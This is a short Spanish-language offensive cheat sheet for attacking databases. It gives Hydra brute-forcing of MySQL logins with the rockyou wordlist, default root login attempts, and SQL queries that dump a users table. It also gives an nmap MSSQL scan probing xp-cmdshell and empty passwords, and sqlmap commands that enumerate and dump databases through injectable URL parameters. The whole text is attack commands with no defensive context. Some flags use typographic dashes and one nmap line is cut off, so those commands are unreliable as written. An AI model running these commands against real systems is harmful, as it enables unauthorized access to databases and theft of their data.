fuerza bruta:
hydra -l usuario -P /usr/share/wordlists/rockyou.txt mysql://ip
Probar acceso remoto por defecto
mysql -h Target_ip -u root -p
Mostras bases de datos
show databases;
Conectar a base de datos
use name_db;
Mostrar tablas
show tables;
Elegir tabla
SELECT * FROM users;
MSQL
Information gathering
nmap -p 1433 –script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql
SQLMap
Listar bases de datos
./sqlmap.py -u http://localhost/files/?id=1 –dbs
Listar tablas
./sqlmap.py -u http://localhost/files/?id=1 -D database_name –tables
Listar columnas
sqlmap.py -u http://localhost/files/?id=1 -D database_name -T table_name –columns
Dump
./sqlmap.py -u http://localhost/files/?id=1 -D database_name -T table_name –dump
Ataque a bbdd sin usuario
sqlmap -u “http://Ip/index.php?tag=” –dbs –batch –random-agent
Mostrar tablas
sqlmap -u “http://ip/index.php?tag=” -D gallery –tables –batch –random-agent